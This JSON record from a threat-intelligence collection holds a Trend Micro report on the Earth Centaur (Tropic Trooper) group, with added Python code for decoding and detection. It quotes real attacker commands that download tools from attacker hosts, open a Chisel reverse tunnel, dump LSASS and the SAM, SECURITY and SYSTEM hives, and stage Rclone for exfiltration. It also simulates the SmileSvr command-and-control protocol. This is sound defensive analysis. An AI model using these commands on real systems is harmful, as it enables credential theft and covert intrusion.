{
	"id": "9442b635-06cd-4989-89ed-099c99d8ec96",
	"created_at": "2026-04-06T00:12:28.77094Z",
	"updated_at": "2026-04-10T03:33:20.032626Z",
	"deleted_at": null,
	"sha1_hash": "d29ffab19faa011ce3afc093ff0b087f3f33763f",
	"title": "Tropic Trooper Targets Transportation and Government Organizations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3495809,
	"plain_text": "Tropic Trooper Targets Transportation and Government Organizations\r\nBy: Nick Dai, Ted Lee, Vickie Su Dec 14, 2021 Read time: 11 min (3068 words)\r\nPublished: 2021-12-14 · Archived: 2026-04-05 15:11:54 UTC\r\nAPT \u0026 Targeted Attacks\r\nCollecting In the Dark: Tropic Trooper Targets Transportation and Government\r\nOur long-term monitoring of the cyberespionage group Earth Centaur (aka Tropic Trooper) shows that the threat actors are equipped with new tools and techniques. The group seems to be targeting transportation companies and government agencies related to transportation.\r\nEarth Centaur, previously known as Tropic Trooper, is a long-running cyberespionage threat group that has been active since 2011. In July 2020, we noticed interesting activity coming from the group, and we have been closely monitoring it since. The actors seem to be targeting organizations in the transportation industry and government agencies related to transport.\r\nWe observed that the group tried to access internal documents (such as flight schedules and financial plans) and personal information on the compromised hosts (such as search histories). So far we have not discovered substantial damage to these victims caused by the threat group. However, we believe that it will continue collecting internal information from the compromised victims and that it is simply waiting for an opportunity to use this data.\r\nThrough long-term monitoring, we learned that this threat group is proficient at red team tradecraft. The group knows how to bypass security settings and keep its operation unobtrusive. Depending on the target, it uses backdoors with different protocols, and it can also use a reverse proxy to evade network security monitoring. Its use of open-source frameworks also allows the group to develop new backdoor variants efficiently. 
We expand on these techniques and other capabilities in the following sections.\r\nMore importantly, we believe the activities we observed are just the tip of the iceberg and that the group's targets might expand to other industries related to transportation. It is our aim, through this article, to encourage enterprises to review their own security settings and protect themselves from damage and compromise.\r\nOverview of Earth Centaur’s infection chain\r\nBased on our investigation, we found that the intrusion process used by Earth Centaur can be separated into several stages, which are shown in Figure 1.\r\nWe found that the threat actors used vulnerabilities in Internet Information Services (IIS) and Exchange servers as entry points, and then installed web shells. Afterward, the .NET loader (detected as Nerapack) and the first-stage backdoor (Quasar remote administration tool, aka Quasar RAT) were deployed on the compromised machine. Then, depending on the victim, the threat actors dropped different types of second-stage backdoors, such as ChiserClient and SmileSvr.\r\nhttps://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html\r\nPage 1 of 15\r\nAfter successfully exploiting the victim's environment, the threat actors start Active Directory (AD) discovery and spread their tools via Server Message Block (SMB). Then, they use intranet penetration tools to build a connection between the victim’s intranet and their command-and-control (C\u0026C) servers. We go into further detail about these stages in our analysis.\r\nFigure 1. Stages of Earth Centaur’s intrusion process\r\nTechnical Analysis of Earth Centaur’s Tools and Techniques\r\nStage 1: Loaders\r\nAfter the threat actors gain access to the vulnerable hosts by using ProxyLogon exploits and web shells, they use the Background Intelligent Transfer Service (BITS, here driven through the PowerShell BitsTransfer module) to download the next-stage loader (detected as Nerapack) as well as its payload file (.bin):\r\nC:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe -Command \"\u0026{Import-Module BitsTransfer; Start-BitsTransfer 'http://\u003credacted\u003e:8000/dfmanager.exe' \"%temp%/dfmanager.exe\"}\"\r\nC:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe -Command \"\u0026{Import-Module BitsTransfer; Start-BitsTransfer 'http://\u003credacted\u003e:8000/dfmanager.bin' \"C:\\Users\\\u003credacted\u003e\\AppData\\Local\\Temp/dfmanager.bin\"}\"\r\nOver our long-term monitoring, we observed two different decryption algorithms (DES or AES) used in Nerapack to decrypt the payload. Moreover, its newer version uses a technique called “timestomping”: the timestamp of the payload file (.bin) is altered so that it no longer stands out when incident response analysts sort files by creation or modification time.\r\nFigure 2. Timestomping used on the bin file\r\nThe decryption key is passed to Nerapack as a command-line argument, and different keys are used on different victims. This is a simple but effective execution guardrail: it makes analysis harder when the key is not recovered alongside the sample, and it ensures that only the operators can use the tools.\r\nThe command for execution is shown here:\r\n\u003e Nerapack.exe {base64 encoded key}\r\nFortunately, we were still able to collect the decryption key in some cases and decrypted the payload successfully. In our current cases, the decrypted payload is Quasar RAT. 
After the payload is deployed, the actors can continue further malicious actions through Quasar RAT.\r\nStage 2: Backdoors\r\nAfter further analysis, we found that the threat group developed multiple backdoors capable of communicating via common network protocols. We think this indicates that it has the capability to bypass network security systems by using these common protocols to transfer data. We also found that the group tries to launch various backdoors per victim. Furthermore, it tends to use existing frameworks to build customized backdoors; by reusing existing frameworks, examples of which are detailed in the following, it builds new backdoor variants more efficiently.\r\nChiserClient\r\nAfter the backdoor is launched, it decrypts the embedded C\u0026C configuration with AES in CTR mode for the following connection. The configuration contains three C\u0026C addresses and their corresponding port numbers.\r\nFigure 3. Decrypted C\u0026C configuration\r\nIn the first connection, ChiserClient appends the host name of the compromised host for check-in purposes. Then, it keeps running on the host and waits for further commands from the C\u0026C server.\r\nChiserClient is installed as a system service, which gives the threat actors higher privileges and persistence on the compromised host. The capabilities of ChiserClient are shown in the following table:\r\nCommand code Function\r\n0x10001 Write specified file\r\n0x10002 Download file\r\n0x10003 Read specified file\r\n0x10004 No action\r\n0x10005 Open a command shell for command execution\r\nHTShell\r\nHTShell is a simple backdoor developed on the Mongoose framework (version 6.15). Mongoose here is Cesanta's embedded networking library, a small C library that provides an HTTP client and server; it is not the Node.js object data modeling (ODM) library for MongoDB that shares the name.\r\nIn our cases, the HTShell client is launched as a system service on the compromised machine and connects to a C\u0026C server. HTShell supports importing an additional config file, located at %PUBLIC%\\Documents\\sdcsvc.dat, whose content must be base64-encoded. If no config file is imported, it connects to the predefined C\u0026C address.\r\nFigure 4. HTShell hardcoded C\u0026Cs\r\nHTShell encodes a hard-coded string, \"tp===\", with a custom base64 alphabet and embeds the encoded string in the request cookies. If the C\u0026C server receives a request carrying this cookie value, it can verify that the request comes from its client.\r\nFigure 5. HTShell hardcoded and encoded cookie string in the request header\r\nThe response handler of HTShell uses “`” as the delimiter to split the command code and arguments of a received command. Hence, a command has this format:\r\n\u003ccommand code\u003e`\u003ccustom-base64encoded-data\u003e[`\u003cmore-custom-base64encoded-data\u003e]\r\nHTShell currently supports three backdoor functions:\r\nCommand code Function\r\n0 Open a command shell for command execution\r\n1 Upload file\r\n2 Download file\r\nCustomized Lilith RAT\r\nDuring our investigation into Earth Centaur's activities, we found that it also uses another backdoor called Lilith RAT. We think that this is a heavily modified version of the open-source Lilith RAT. The actors reused part of the code for command execution, while the C\u0026C protocol was changed to the Dropbox HTTPS API.\r\nFigure 6. Reused code from open-source Lilith RAT\r\nIn order to launch this RAT, the threat actors use a technique called \"phantom DLL hijacking\": the RAT is disguised as wlbsctrl.dll, a DLL that the Windows service “IKEEXT” tries to load at startup but that does not exist on a default installation. When IKEEXT starts, the fake wlbsctrl.dll is loaded and executed with the service's high privileges. Furthermore, when Lilith RAT is terminated, it tries to delete itself to avoid being found by investigators.\r\nFigure 7. Self-deletion after execution\r\nFor the C\u0026C connections, the customized Lilith RAT first checks in to the attacker’s Dropbox and sees whether the victim host already exists. If not, the hostname and IP address are collected and appended to the existing compromised hosts’ information. All data are then encrypted and sent back.\r\nFigure 8. The first check-in request to the Dropbox C\u0026C\r\nAfter the check-in request, the backdoor starts to wait for more commands. All request data are formatted as JSON, encrypted with AES, and encoded with base64.\r\nHere is a list of the C\u0026C commands:\r\nCommand Description\r\nCMDCommand Executes commands\r\nDownloadCloudFile Downloads files\r\nUploadCloudFile Uploads files\r\nGetDir Lists directories\r\nGetDirFile Lists files in a directory\r\nDeleteSelf Deletes itself\r\nSmileSvr\r\nWe found that there are two types of SmileSvr. The difference between the two variants is the protocol used for communication: ICMP and SSL. The threat actors use an installer to install SmileSvr as a system service and drop a DAT file that contains encoded C\u0026C information. 
In the configuration file, the buffer size reserved for the C\u0026C address and the C\u0026C address itself are defined.\r\nFigure 9. Encrypted configuration file\r\nThe ICMP version of SmileSvr creates an ICMP socket to connect to the C\u0026C address defined in the configuration file. Each SmileSvr sample has an embedded number (e.g., 10601 in Figure 10), which is used as the sequence number of the ICMP packets it sends. We think the attackers use this value to verify that an incoming packet belongs to their backdoor and to filter out noise.\r\nFigure 10. Decrypted configuration file\r\nWithout seeing real traffic from the C\u0026C server, we can only infer the content of the response from the receiving function. As shown in Figure 11, the response should contain the sequence number, used to verify that the received data come from the correct source, followed by two blocks of encrypted data.\r\nThe data decryption procedure is as follows:\r\n1. First, the encrypted data is decrypted with a one-byte XOR key (0xFF).\r\n2. The first block of decrypted content contains a magic number used to check the data in the second block, a command code, and the XOR key used to decrypt the second block.\r\n3. The second block is decrypted with the XOR key (0x99 in this sample) obtained from the first block; the decrypted data holds the instructions for the following procedures.\r\nFigure 11. SmileSvr packet traffic format simulation\r\nWhile analyzing the samples, we found that the C\u0026C server was already inactive. Without the traffic between SmileSvr and the C\u0026C server, we could not fully understand all of its functions. 
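The two-stage XOR procedure above, as an added example that is not part of the original article: a Python simulation of the SmileSvr reply format that builds an ICMP echo reply carrying the sequence number 10601, filters out packets with any other sequence number the way the receiving function does, and then peels the two XOR layers. The article names the fields and the constants (10601, 0xFF, 0x99) but not the byte layout, so the field widths, byte order, ICMP type and the magic value 0x5A5A used here are assumptions.

```python
import struct

# Values given in the article: the per-sample ICMP sequence number, the first-stage XOR key
# and the second-stage XOR key recovered from the analyzed sample.
SEQ_NUMBER = 10601
OUTER_XOR_KEY = 0xFF
INNER_XOR_KEY = 0x99
# Assumption: a 16-bit magic value; the real constant is not given in the article.
MAGIC = 0x5A5A


def xor_bytes(data, key):
    # One-byte XOR over the whole buffer (both decryption stages use this).
    return bytes(b ^ key for b in data)


def icmp_checksum(data):
    # RFC 1071 ones-complement checksum. Run over a packet whose checksum field is
    # already correct it returns 0, which parse_response relies on.
    if len(data) % 2:
        data += bytes(1)
    total = sum(struct.unpack('!%dH' % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_response(command_code, instructions, seq=SEQ_NUMBER, ident=0x1234):
    # Simulated C&C reply (ICMP echo reply, type 0) in an assumed big-endian layout:
    #   block 1 (XOR 0xFF): magic(2) | command code(2) | inner XOR key(1)
    #   block 2 (XOR key):  magic(2) | instruction bytes
    block1 = xor_bytes(struct.pack('!HHB', MAGIC, command_code, INNER_XOR_KEY), OUTER_XOR_KEY)
    block2 = xor_bytes(struct.pack('!H', MAGIC) + instructions, INNER_XOR_KEY)
    body = block1 + block2
    unchecked = struct.pack('!BBHHH', 0, 0, 0, ident, seq) + body
    return struct.pack('!BBHHH', 0, 0, icmp_checksum(unchecked), ident, seq) + body


def parse_response(packet):
    # Mirrors the receiving function described above: drop packets whose sequence number
    # is not the embedded one, then peel the two XOR layers and check the magic.
    # Returns (command_code, instructions), or None for filtered-out noise.
    if 8 > len(packet):
        raise ValueError('packet too short for an ICMP header')
    _icmp_type, _code, _checksum, _ident, seq = struct.unpack('!BBHHH', packet[:8])
    if seq != SEQ_NUMBER:
        return None                     # not our backdoor's traffic: ignore
    if icmp_checksum(packet) != 0:
        raise ValueError('bad ICMP checksum')
    body = packet[8:]
    if 7 > len(body):
        raise ValueError('body too short for both blocks')
    magic, command_code, inner_key = struct.unpack('!HHB', xor_bytes(body[:5], OUTER_XOR_KEY))
    block2 = xor_bytes(body[5:], inner_key)
    if struct.unpack('!H', block2[:2])[0] != magic:
        raise ValueError('second block failed the magic check')
    return command_code, block2[2:]


if __name__ == '__main__':
    reply = build_response(0x5006, b'cmd.exe')    # 0x5006: open command shell
    print(parse_response(reply))
    print(parse_response(build_response(0x5001, b'c:/boot.ini', seq=7)))  # noise: None
```

A real decoder would sit on a raw ICMP socket or a pcap and apply the same three gates in the same order: sequence number, checksum, magic; the sequence-number gate is what lets the backdoor coexist with ordinary ping traffic, and it is also the cheapest network-side filter for hunting this beacon.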
Most of the backdoor functions we could identify are listed here:\r\nCommand code Function\r\n0x5001 Opens/reads specified file\r\n0x5002 Unknown\r\n0x5004 Opens/writes specified file\r\n0x5006 Opens command shell\r\n0x5007 Unknown\r\n0x5009 Closes command shell\r\n0x500A File system traversal\r\n0x500C Checks environment information\r\n0x500E Unknown\r\nAs for the SSL version of SmileSvr, its SSL communication is built with wolfSSL, a lightweight SSL/TLS library written in C. The backdoor functions of the SSL version are similar to those of the ICMP version; the threat actors simply use it to add support for data transfer over an encrypted channel.\r\nCustomized Gh0st RAT\r\nIn our investigation, we also found a suspicious executable named telegram.exe. After analyzing the file, we found that it was a customized version of Gh0st RAT. Compared to the original Gh0st RAT (Gh0st beta 3.6), the customized version supports a new function to discover information about active sessions on the host.\r\nAll supported functions of the customized Gh0st are shown in the following table:\r\nCommand code Function\r\n0xC8 Terminates connection\r\n0xCA File manager to handle file operations\r\n0xCB Screen monitoring\r\n0xCC Opens remote shell for command execution\r\n0xD5 Gets active session information\r\nPost-Exploitation\r\nAfter successfully exploiting the vulnerable system, the threat actor uses multiple hacking tools to discover and compromise machines on the victim’s intranet. In this stage, we also observed attempts to deploy tools to exfiltrate stolen information.\r\nDuring our investigation, we found evidence of the specific tools listed in Table 1. 
With these tools, the attackers accomplish their goals (network discovery, access to the intranet, and exfiltration) step by step.\r\nTable 1. Tools observed in the post-exploitation stage\r\nTool name Purpose Description\r\nSharpHound AD discovery Discovery tool to map the relationships in an AD environment\r\nFRPC Intranet penetration Fast reverse proxy that exposes a local server behind a NAT or firewall to the internet\r\nChisel Intranet penetration Fast TCP/UDP tunnel\r\nRclone Exfiltration Command-line program to sync files and directories to and from different cloud storage providers\r\nCredential Dumping\r\nWe also observed that the group used multiple legitimate tools to dump credentials on compromised machines. It made good use of these tools to achieve its goal while keeping its operation hidden and unobtrusive.\r\nFor example, the group uses ProcDump.exe (a Sysinternals tool that creates process dumps), which it renamed bootsys.exe so that the file name alone does not give it away:\r\nc:\\users\\public\\downloads\\bootsys.exe  -accepteula -ma lsass.exe C:\\Users\\Public\\Downloads\\lsass.dmp\r\nThe group dumps the credential material stored in the registry hives (SAM, SECURITY and SYSTEM, the latter holding the boot key needed to decrypt the SAM) by using reg.exe:\r\nreg.exe save hklm\\sam C:\\Users\\Public\\Downloads\\sam.hive\r\nreg.exe save hklm\\sam c:\\windows\\temp\\sa.dit\r\nreg.exe save hklm\\security c:\\windows\\temp\\se.dit\r\nreg.exe save hklm\\system c:\\windows\\temp\\sy.dit\r\nThe group also dumps the memory of a specified process (here PID 764) by calling the MiniDump export of comsvcs.dll through rundll32.exe:\r\nrundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump 764 C:\\Windows\\TEMP\\dump.bin full\r\nIndicator Removal\r\nTo avoid exposing their footprints to investigators, the threat actors made their own tool to wipe the event logs on the victimized machine. By using this tool, they can clear specified event logs and make it hard for investigators to track their operations.\r\nThe usage is as follows:\r\nIntranet Penetration\r\nAfter successfully exploiting the vulnerable system, the threat actors also drop the following tools: FRP and Chisel. FRP is a fast reverse proxy used to expose a local server behind a NAT or firewall to the internet. It reads a predefined configuration and makes the host in the intranet reachable from the internet.\r\nFigure 12. Configuration for FRP fast reverse proxy\r\nChisel is a fast TCP/UDP tunnel mainly used for passing through firewalls. It transports data over HTTP (secured via Secure Shell, aka SSH) and allows the threat actors to pass through a firewall and reach the machine behind it.\r\nThis command downloads the Chisel reverse proxy via PowerShell:\r\nc:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -command \"$(new-object System.Net.WebClient).DownloadFile('https[:]//webadmin[.]mirrorstorage[.]org/ch.exe', 'ch.exe')\"\r\nThis command builds the connection between the internet and the intranet via Chisel, routing a SOCKS proxy (the r:...:socks remote) through the tunnel so that the attackers can reach the intranet behind the firewall:\r\nC:\\WINDOWS\\system32\\ch.exe client https[:]//webadmin[.]mirrorstorage[.]org:443 r:127.0.0.1:47586:socks\r\nExfiltration\r\nIn the previous phase, we observed that the actors use several tools to get the whole picture of the network infrastructure and bypass the firewall. Afterward, we observed a PowerShell command used to download Rclone, an effective tool used for exfiltration. 
Rclone also provides an easy and effective way of copying data to several cloud storage providers.\r\nC:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command \"$(new-object System.Net.WebClient).DownloadFile('http://195[.]123[.]221[.]7:8080/rclone.exe', 'r.exe')\"\r\nBased on previous experience, Rclone has frequently been used in ransomware attacks to exfiltrate stolen data. It now appears that it is used not only in ransomware attacks but also in APT attacks.\r\nIdentifying Features in the Earth Centaur Campaign\r\nAfter long-term observation and analysis of the attack campaigns, we found compelling evidence that they were operated by Earth Centaur. We found several identifying features of the threat actors within the techniques and tools described in the preceding sections, and we break down these factors in the following.\r\nMutex Style\r\nWe found some special mutexes in ChiserClient whose names are the QWERTY keystrokes of the standard Chinese Zhuyin (Bopomofo) keyboard layout. The decoded strings are shown in Table 2. Based on these special mutex strings, we believe the threat actors come from a Chinese-speaking region.\r\nTable 2. Encoded/decoded mutex strings\r\nEncoded string Decoded string in Chinese English translation\r\nvul3ru,6q8 q8 y.3 小傑趴趴走 Jack goes around\r\nji394su3 我愛你 I love you\r\n5ji fu.6cl3g.3zj6m0694 桌球好手福原愛 Excellent table tennis player, Ai Fukuhara\r\nConfiguration style\r\nAfter analyzing ChiserClient, we found that it shares a similar style of network configuration with the TClient mentioned in our previous research on Earth Centaur.\r\nFigure 13. Network configuration (Left: ChiserClient Right: TClient)\r\nCode Similarity\r\nAfter checking the backdoor SmileSvr, we found a code similarity between it and Troj_YAHAMAM, which was used by Earth Centaur in an earlier operation. Both share similar code for configuration decoding, as shown in Figure 14. Furthermore, the delimiter used in SmileSvr to split the different values in its configuration file is the same as the one used in YAHAMAM (shown in Figure 15).\r\nFigure 14. Configuration decoding function (left: SmileSvr right: Troj_Yahamam)\r\nFigure 15. Function used to split different values in the configuration file (left: SmileSvr right: Troj_Yahamam)\r\nConclusion\r\nThese threat actors are notably sophisticated and well-equipped. Looking deeper into the new methods the group uses, we found that it has an arsenal of tools capable of assessing and then compromising its targets while remaining under the radar. For example, the group can map its target’s network infrastructure and bypass firewalls. It uses backdoors with different protocols, which are deployed depending on the victim. It also has the capability to develop customized tools to evade security monitoring in different environments, and it exploits vulnerable websites and uses them as C\u0026C servers.\r\nIn this blog, we outlined our new findings related to these threat actors to help possible targets in the transportation and other industries. 
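The Zhuyin keyboard decoding behind the mutex names in Table 2, as an added example that is not code from the original article: a Python decoder for the standard (Daqian) Zhuyin layout that turns the keystroke strings into Bopomofo syllables with tone marks. It recovers the phonetic reading (ㄨㄛˇ ㄞˋ ㄋㄧˇ for ji394su3); picking the characters 我愛你 from that reading is the IME's candidate selection and is not reproduced here. The looks_like_zhuyin helper and its heuristic are additions of this example, meant for hunting similar mutex or pipe names.

```python
# Key -> Bopomofo symbol on the standard Zhuyin layout (digits 1 2 5 8 9 0 are symbols too).
ZHUYIN_KEYS = {
    '1': 'ㄅ', 'q': 'ㄆ', 'a': 'ㄇ', 'z': 'ㄈ', '2': 'ㄉ', 'w': 'ㄊ', 's': 'ㄋ', 'x': 'ㄌ',
    'e': 'ㄍ', 'd': 'ㄎ', 'c': 'ㄏ', 'r': 'ㄐ', 'f': 'ㄑ', 'v': 'ㄒ',
    '5': 'ㄓ', 't': 'ㄔ', 'g': 'ㄕ', 'b': 'ㄖ', 'y': 'ㄗ', 'h': 'ㄘ', 'n': 'ㄙ',
    'u': 'ㄧ', 'j': 'ㄨ', 'm': 'ㄩ',
    '8': 'ㄚ', 'i': 'ㄛ', 'k': 'ㄜ', ',': 'ㄝ', '9': 'ㄞ', 'o': 'ㄟ', 'l': 'ㄠ', '.': 'ㄡ',
    '0': 'ㄢ', 'p': 'ㄣ', ';': 'ㄤ', '/': 'ㄥ', '-': 'ㄦ',
}
# Tone keys terminate a syllable: space = 1st tone (unmarked), 6 / 3 / 4 = 2nd / 3rd / 4th,
# 7 = neutral tone, whose dot is conventionally written before the syllable.
TONE_KEYS = {' ': '', '6': 'ˊ', '3': 'ˇ', '4': 'ˋ', '7': '˙'}


def decode_zhuyin(keystrokes):
    # Returns the list of Bopomofo syllables (with tone marks) spelled by the keystrokes.
    syllables = []
    current = ''
    for ch in keystrokes:
        if ch in TONE_KEYS:
            if current:
                mark = TONE_KEYS[ch]
                syllables.append(mark + current if ch == '7' else current + mark)
                current = ''
            continue
        if ch not in ZHUYIN_KEYS:
            raise ValueError('not a Zhuyin keystroke: %r' % ch)
        current += ZHUYIN_KEYS[ch]
    if current:                       # trailing syllable typed without a tone key
        syllables.append(current)
    return syllables


def looks_like_zhuyin(name):
    # Cheap hunting heuristic (this example's own): every character is a Zhuyin key and the
    # string ends on a tone key, as all three mutex names in Table 2 do.
    return (len(name) > 1
            and all(ch in ZHUYIN_KEYS or ch in TONE_KEYS for ch in name)
            and name[-1] in TONE_KEYS)


if __name__ == '__main__':
    for mutex in ('vul3ru,6q8 q8 y.3', 'ji394su3', '5ji fu.6cl3g.3zj6m0694'):
        print(mutex, '::', ' '.join(decode_zhuyin(mutex)))
```

Because the tone keys double as syllable terminators, the decoder needs no dictionary: it is enough to confirm that a mutex name is well-formed Zhuyin typing, which is the attribution signal the section relies on.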
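As an added example that is not part of the original article, the following Python script runs argument-based detections over constructed process-creation log lines that reuse the command lines quoted in the Stage 1, Credential Dumping, Intranet Penetration and Exfiltration sections, plus two benign lines that must not fire. The log is constructed for the example: 192.0.2.10 stands in for the redacted BITS host, and the defanged indicators are written as they would appear in a real log. The ATT\u0026CK IDs in the rule labels are the ones used in this article, except T1003.002 for the hive dump, which this example adds. The point is that matching on arguments such as -ma lsass, comsvcs.dll MiniDump and reg save of the SAM hive catches ProcDump even after it has been renamed to bootsys.exe.

```python
# Constructed process-creation log, one command line per line. The first eight lines reuse
# the article's command lines (192.0.2.10 replaces the redacted BITS server); the last two
# are benign and must not match.
SAMPLE_LOG = '''
c:\\users\\public\\downloads\\bootsys.exe  -accepteula -ma lsass.exe C:\\Users\\Public\\Downloads\\lsass.dmp
reg.exe save hklm\\sam c:\\windows\\temp\\sa.dit
reg.exe save hklm\\security c:\\windows\\temp\\se.dit
rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump 764 C:\\Windows\\TEMP\\dump.bin full
C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe -Command \"&{Import-Module BitsTransfer; Start-BitsTransfer 'http://192.0.2.10:8000/dfmanager.exe' \"%temp%/dfmanager.exe\"}\"
c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -command \"$(new-object System.Net.WebClient).DownloadFile('https://webadmin.mirrorstorage.org/ch.exe', 'ch.exe')\"
C:\\WINDOWS\\system32\\ch.exe client https://webadmin.mirrorstorage.org:443 r:127.0.0.1:47586:socks
C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command \"$(new-object System.Net.WebClient).DownloadFile('http://195.123.221.7:8080/rclone.exe', 'r.exe')\"
C:\\Windows\\System32\\svchost.exe -k netsvcs -p
reg.exe query hklm\\software\\microsoft\\windows\\currentversion\\run
'''


def normalize(cmdline):
    # Lower-case, unify path separators and collapse whitespace so the rules stay simple.
    return ' '.join(cmdline.replace('\\', '/').lower().split())


def _first_token(c):
    return c.split()[0] if c else ''


# (label, predicate over the normalized command line). Every predicate keys on arguments,
# never on the image name, so renaming procdump.exe to bootsys.exe does not help the actor.
RULES = [
    ('LSASS dump via ProcDump-style arguments (T1003.001)',
     lambda c: ' -ma ' in c and 'lsass' in c),
    ('Process dump via comsvcs.dll MiniDump through rundll32 (T1003.001, T1218.011)',
     lambda c: 'comsvcs.dll' in c and 'minidump' in c),
    ('SAM/SECURITY/SYSTEM hive dump via reg.exe save (T1003.002)',
     lambda c: _first_token(c).endswith(('reg', 'reg.exe')) and ' save ' in c
               and any(h in c for h in ('hklm/sam', 'hklm/security', 'hklm/system'))),
    ('BITS download via PowerShell BitsTransfer (T1197)',
     lambda c: 'start-bitstransfer' in c),
    ('PowerShell W
ebClient.DownloadFile download cradle (T1059.001)'.replace('W\nebClient', 'WebClient'),
     lambda c: 'webclient' in c and 'downloadfile(' in c),
    ('Chisel client opening a SOCKS tunnel (T1090.001)',
     lambda c: ' client ' in c and ':socks' in c),
    ('Rclone staged on host (T1567.002)',
     lambda c: 'rclone' in c),
]


def scan(log_text):
    # Returns [(original line, [matched rule labels])] for every line that hits a rule.
    hits = []
    for line in log_text.strip().splitlines():
        c = normalize(line)
        labels = [label for label, match in RULES if match(c)]
        if labels:
            hits.append((line.strip(), labels))
    return hits


if __name__ == '__main__':
    for line, labels in scan(SAMPLE_LOG):
        print(line[:60], '::', labels)
```

In production these predicates would be Sigma rules or EDR queries over the command-line field rather than substring checks, but the lesson carries over: the renamed ProcDump, the reg.exe hive saves and the comsvcs.dll MiniDump call all leave their arguments intact, and the Chisel client command is recognisable from its remote specification regardless of what the binary was renamed to.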
Information on how a threat enters and operates within a victim’s network is invaluable to security teams and can help them create more effective protection for vulnerable organizations. Organizations can also find capable security solutions that help interpret and respond to malicious activities, techniques, and movements before the threat can culminate and affect an enterprise. Trend Micro Vision One™️ with Managed XDR products gives security teams a consolidated view into valuable insights so they can organize a more solid line of defense ahead of attacks.\r\nFor a list of the Indicators of Compromise, please see the accompanying document.\r\nMITRE ATT\u0026CK Matrix\r\nTactic ID Technique\r\nInitial Access T1190 Exploit Public-Facing Application\r\nExecution T1059.001 Command and Scripting Interpreter: PowerShell\r\nExecution T1059.003 Command and Scripting Interpreter: Windows Command Shell\r\nExecution T1569.002 System Services: Service Execution\r\nPersistence T1543.003 Create or Modify System Process: Windows Service\r\nPersistence T1574.002 Hijack Execution Flow: DLL Side-Loading\r\nPersistence T1505.003 Server Software Component: Web Shell\r\nDefense Evasion T1140 Deobfuscate/Decode Files or Information\r\nDefense Evasion T1480 Execution Guardrails\r\nDefense Evasion T1574.002 Hijack Execution Flow: DLL Side-Loading\r\nDefense Evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs\r\nDefense Evasion T1027.002 Obfuscated Files or Information: Software Packing\r\nDefense Evasion T1218.011 Signed Binary Proxy Execution: Rundll32\r\nDefense Evasion T1036.005 Masquerading: Match Legitimate Name or Location\r\nDefense Evasion T1197 BITS Jobs\r\nDefense Evasion T1070.006 Indicator Removal on Host: Timestomp\r\nCredential Access T1003.001 OS Credential Dumping: LSASS Memory\r\nCredential Access T1552.002 Unsecured Credentials: Credentials in Registry (the reg.exe save of the SAM, SECURITY and SYSTEM hives shown above maps more precisely to T1003.002 OS Credential Dumping: Security Account Manager)\r\nLateral Movement T1021.002 Remote Services: SMB/Windows Admin Shares\r\nDiscovery T1087.002 Account Discovery: Domain Account\r\nDiscovery T1482 Domain Trust Discovery\r\nDiscovery T1083 File and Directory Discovery\r\nCollection T1005 Data from Local System\r\nCommand and Control T1071.001 Application Layer Protocol: Web Protocols\r\nCommand and Control T1095 Non-Application Layer Protocol\r\nCommand and Control T1090.001 Proxy: Internal Proxy\r\nExfiltration T1567.002 Exfiltration to Cloud Storage\r\nSource: https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html"
	],
	"report_names": [
		"collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html"
	],
	"threat_actors": [
		{
			"id": "61ea51ed-a419-4b05-9241-5ab0dbba25fc",
			"created_at": "2023-01-06T13:46:38.354607Z",
			"updated_at": "2026-04-10T02:00:02.939761Z",
			"deleted_at": null,
			"main_name": "APT23",
			"aliases": [
				"BRONZE HOBART",
				"G0081",
				"Red Orthrus",
				"Earth Centaur",
				"PIRATE PANDA",
				"KeyBoy",
				"Tropic Trooper"
			],
			"source_name": "MISPGALAXY:APT23",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bef7800a-a08f-4e21-b65c-4279c851e572",
			"created_at": "2022-10-25T15:50:23.409336Z",
			"updated_at": "2026-04-10T02:00:05.319608Z",
			"deleted_at": null,
			"main_name": "Tropic Trooper",
			"aliases": [
				"Tropic Trooper",
				"Pirate Panda",
				"KeyBoy"
			],
			"source_name": "MITRE:Tropic Trooper",
			"tools": [
				"USBferry",
				"ShadowPad",
				"PoisonIvy",
				"BITSAdmin",
				"YAHOYAH",
				"KeyBoy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "578f8e62-2bb4-4ce4-a8b7-6c868fa29724",
			"created_at": "2022-10-25T16:07:24.344358Z",
			"updated_at": "2026-04-10T02:00:04.947834Z",
			"deleted_at": null,
			"main_name": "Tropic Trooper",
			"aliases": [
				"APT 23",
				"Bronze Hobart",
				"Earth Centaur",
				"G0081",
				"KeyBoy",
				"Operation Tropic Trooper",
				"Pirate Panda",
				"Tropic Trooper"
			],
			"source_name": "ETDA:Tropic Trooper",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"ByPassGodzilla",
				"CHINACHOPPER",
				"CREDRIVER",
				"China Chopper",
				"Chymine",
				"Darkmoon",
				"Gen:Trojan.Heur.PT",
				"KeyBoy",
				"Neo-reGeorg",
				"PCShare",
				"POISONPLUG.SHADOW",
				"Poison Ivy",
				"RoyalRoad",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Swor",
				"TSSL",
				"USBferry",
				"W32/Seeav",
				"Winsloader",
				"XShellGhost",
				"Yahoyah",
				"fscan",
				"pivy",
